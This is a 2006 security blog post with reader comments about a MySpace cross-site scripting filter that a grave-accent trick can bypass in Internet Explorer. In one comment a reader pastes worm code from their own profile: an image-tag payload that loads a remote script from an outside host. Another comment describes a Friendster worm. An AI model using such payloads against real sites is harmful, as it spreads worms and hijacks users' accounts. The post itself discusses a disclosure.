MySpace Fixes Security Hole and Continues To Be Vulnerable
This is nearly a classic case of where understanding browser differences and the nuances of XSS is vital when you’re trying to stop attacks but still allow HTML. Yup, you guessed it, MySpace is still vulnerable to cross site scripting in the exact same way that they were vulnerable before, except now it only works in Internet Explorer.
You can read the forums to get the specifics, but basically by using a grave accent instead of single or double quote you can evade the filters that they put in place to stop Kuza55’s XSS fragmentation exploit that he disclosed earlier this week. Pretty nasty. Maluc also created a proof of concept that demonstrates the issue on the forums. It takes a few seconds to execute but it’s definitely still a valid exploit against the social networking platform.
October 28th, 2006 at 2:19 pm
[…] Original post by RSnake for Myspace News MySpace Fixes Security Hole and Continues To Be Vulnerable […]
October 30th, 2006 at 5:46 pm
I logged into my myspace this afternoon to see that a worm had propogated onto my page.
The code found on my page was:
(thats it put together)
The website that the .js file resides in was not responding when I noticed this on my page.
I assume that if you change the x.src to a valid url then the xss will be working but as yet I haven’t tried it.
Also, rsnake, I tried regging on the forums, but the link on the email is throwing up “Sorry, there was an error verifying your account. Please make sure you used the entire URL included in the email you received.” Could you fix this please
October 30th, 2006 at 5:48 pm
hmm, seems that you disallow scripts on comments (which i didn’t know). Here it is without the :
img src=”http://xss.xss/xss.jpg” x=’var x=document.createElement(’script’);x.src=’http://www.actualizando.com/…/test.js’;document.getElementsByTagName(’body’)[0].appendChild(x);”
October 30th, 2006 at 7:04 pm
Hrmm… we seem to be having problems with wordpress… can you email it to me? I’ll post it. It’s worth talking about.
November 3rd, 2006 at 7:52 am
Friendster too.
http://www.friendster.com/34517631
I heard that a worm already spread a few months ago. Apparently, it was a flash file running js which creates and submits a form which embeds the same flash file into the viewers profile if he/she is logged in. Friendster got a little smarter and inserted allowScriptAccess=”never” attribute on to your embedded flash file. But forget the flash file, the input is still vulnerable anyway.
It is being used to generate overlays for profiles.
http://friendster-tweakers.com/markyctrigger-overlay-generator/
I think it also have an auto-testimonial submission (teh user not knowing he/she already gave a way a testimonial) thing and a “who’s viewed me” thing regardless of the user’s privacy settings.
December 1st, 2006 at 4:38 am
Anyone else having bother with myspace or is it just my pc?
Last couple of days it seems it wont let me download any song from anywhere.
Anyone having same bother - or anyone how to sort it?